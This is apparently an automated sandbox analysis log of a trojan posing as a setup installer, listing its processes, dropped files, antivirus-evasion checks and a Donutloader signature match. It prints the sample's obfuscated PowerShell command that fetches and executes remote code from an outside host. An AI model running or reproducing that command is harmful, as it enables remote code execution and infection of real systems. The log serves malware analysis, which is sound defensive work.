              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0093D511 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_0093D511
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 37_2_008C51EB NtQuerySystemInformation,37_2_008C51EB
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F03510_2_008F0351
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0093D5110_2_0093D511
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F00000_2_008F0000
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0092600A0_2_0092600A
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0090800D0_2_0090800D
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0090F00E0_2_0090F00E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0091E0620_2_0091E062
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0092806E0_2_0092806E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0091E1B70_2_0091E1B7
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0091E1A80_2_0091E1A8
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0090A1C10_2_0090A1C1
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008FA1EE0_2_008FA1EE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F512E0_2_008F512E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F713E0_2_008F713E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0091E1520_2_0091E152
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008FE14A0_2_008FE14A
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0090C2AE0_2_0090C2AE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_009232DE0_2_009232DE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008FC2EE0_2_008FC2EE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_009032620_2_00903262
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_009283BE0_2_009283BE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0092F37E0_2_0092F37E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_009134DE0_2_009134DE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0090F41E0_2_0090F41E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0092168E0_2_0092168E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0092F67E0_2_0092F67E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0092966E0_2_0092966E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0091F7910_2_0091F791
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0090F78E0_2_0090F78E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_009277BE0_2_009277BE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0091D7130_2_0091D713
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0090273F0_2_0090273F
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0092B89E0_2_0092B89E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0091388E0_2_0091388E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F799E0_2_008F799E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0092F9BE0_2_0092F9BE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_009089D90_2_009089D9
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0090D9CE0_2_0090D9CE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0090F9FE0_2_0090F9FE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_009179FE0_2_009179FE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_009269030_2_00926903
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F5ADE0_2_008F5ADE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0091DA570_2_0091DA57
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008FAA5E0_2_008FAA5E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00900A6E0_2_00900A6E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008FEB2A0_2_008FEB2A
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0091BB7E0_2_0091BB7E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0092BCDE0_2_0092BCDE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00909CEA0_2_00909CEA
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F8C0E0_2_008F8C0E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008FFC330_2_008FFC33
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00912D1E0_2_00912D1E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0092FD0E0_2_0092FD0E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0090ED2E0_2_0090ED2E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008FAEDE0_2_008FAEDE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00910ECE0_2_00910ECE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F9EEE0_2_008F9EEE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00916E0E0_2_00916E0E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F7E2E0_2_008F7E2E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0090BFCE0_2_0090BFCE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0092CFE10_2_0092CFE1
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0090AFEE0_2_0090AFEE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00908F260_2_00908F26
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00928F5E0_2_00928F5E
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 37_2_008C383837_2_008C3838
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe 36E2B9BAA6A42E568DA06872089A66ACFB533B14DCF52568D061F51A606BD59F
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp E25EF8AA3AB40EE6950DACC4CCD9EDD1EBE973D45109F6EEF34F7F49E26A2E27
              Source: C:\Users\user\Desktop\@Setup.exeCode function: String function: 008F97BE appears 77 times
              Source: C:\Users\user\Desktop\@Setup.exeCode function: String function: 0090620E appears 63 times
              Source: @Setup.exeStatic PE information: invalid certificate
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp.8.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: NBKXWJSCH7YAAAADC9LJIYY.exe.0.drStatic PE information: Number of sections : 11 > 10
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp.6.drStatic PE information: Number of sections : 11 > 10
              Source: NBKXWJSCH7YAAAADC9LJIYY.tmp.8.drStatic PE information: Number of sections : 11 > 10
              Source: @Setup.exeStatic PE information: Number of sections : 13 > 10
              Source: @Setup.exe, 00000000.00000000.1666034418.000000000066D000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAblebitsLoader.exex, vs @Setup.exe
              Source: @Setup.exe, 00000000.00000003.2092110610.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameum_player.exe vs @Setup.exe
              Source: @Setup.exeBinary or memory string: OriginalFilenameAblebitsLoader.exex, vs @Setup.exe
              Source: @Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: @Setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
              Source: @Setup.exeStatic PE information: Section: ZLIB complexity 1.002685546875
              Source: @Setup.exeStatic PE information: Section: ZLIB complexity 1.0007267441860466
              Source: @Setup.exeStatic PE information: Section: ZLIB complexity 1.000859375
              Source: @Setup.exeStatic PE information: Section: ZLIB complexity 1.0071614583333333
              Source: @Setup.exeStatic PE information: Section: ZLIB complexity 1.0003821331521738
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@59/15@4/3
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_008F0A61 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_008F0A61
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpFile created: C:\Users\user\AppData\Roaming\UltraMediaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeMutant created: \Sessions\1\BaseNamedObjects\FSCapture
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2252:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
              Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
              Source: tasklist.exe, 0000001B.00000003.2779797175.0000027084E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'OF_PROCE;V
              Source: tasklist.exe, 0000001B.00000003.2779797175.0000027084E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'Wbem;C:\|V
              Source: @Setup.exe, 00000000.00000003.1868435641.00000000033FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: @Setup.exeReversingLabs: Detection: 23%
              Source: C:\Users\user\Desktop\@Setup.exeFile read: C:\Users\user\Desktop\@Setup.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\@Setup.exe "C:\Users\user\Desktop\@Setup.exe"
              Source: C:\Users\user\Desktop\@Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\@Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe "C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe"
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeProcess created: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp "C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp" /SL5="$A0076,11205210,845824,C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe "C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeProcess created: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp "C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp" /SL5="$C0070,11205210,845824,C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
              Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe "C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe"
              Source: C:\Users\user\Desktop\@Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?Jump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe "C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeProcess created: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp "C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp" /SL5="$A0076,11205210,845824,C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe "C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeProcess created: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp "C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp" /SL5="$C0070,11205210,845824,C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9 Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpProcess created: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe "C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: windows.storage.dllJump to behavior
